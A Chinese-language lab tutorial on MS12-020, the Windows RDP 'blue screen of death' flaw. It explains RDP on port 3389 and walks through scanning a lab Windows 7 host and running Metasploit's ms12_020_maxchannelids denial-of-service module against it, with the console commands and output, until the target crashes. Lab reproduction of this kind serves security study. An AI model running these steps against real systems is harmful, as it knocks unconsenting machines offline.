前言

本次介绍Windows经典蓝屏漏洞 MS12-020（死亡蓝屏）

一、漏洞介绍

什么是MS12-020 

MS12-020  RDP远程代码执行漏洞，Windows操作系统中的远程桌面协议给用户带来很多便利，同时也产生了很多影响十分严重的漏洞影响很大，

RDP，Remote Desktop Protocol,远程桌面协议，是一个多通道（mutil-channel）的协议，让用户（客户端或称“本地电脑”）连上提供微软终端机服务的电脑（服务器端或称“远程电脑”）。大部分的Windows、Linux、FreeBSD、Mac OS X都有相应的客户端。服务端听取送到 TCP 3389 端口的数据。

远程桌面的服务端口为3389

二、漏洞复现

1.前期准备

靶机：Windows7 （未打此漏洞补丁的Windows7系统）

攻击机：kali Linux 

2.漏洞复现

靶机信息收集

使用nmap工具扫描靶机 查看靶机开放端口

得知靶机开启3389端口

1.启动msf

2.搜索ms12-020漏洞模块

使用第一个 搜索模块 探测靶机是否存在此漏洞

use 0

1. 查看所需配置

Show options

4.设置IP

出现绿色点说明漏洞存在漏洞

切换到攻击模块

Back

msf6 > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > show options



Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):



   Name    Current Setting  Required  Description

   ----    ---------------  --------  -----------

   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

   RPORT   3389             yes       The target port (TCP)



msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set rhosts 10.10.10.141

rhosts => 10.10.10.141

msf6 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > run

靶机已经蓝屏

总结

本次介绍了Windows系统经典漏洞 MS12-020 (死亡蓝屏) 总结了漏洞原理和复现过程。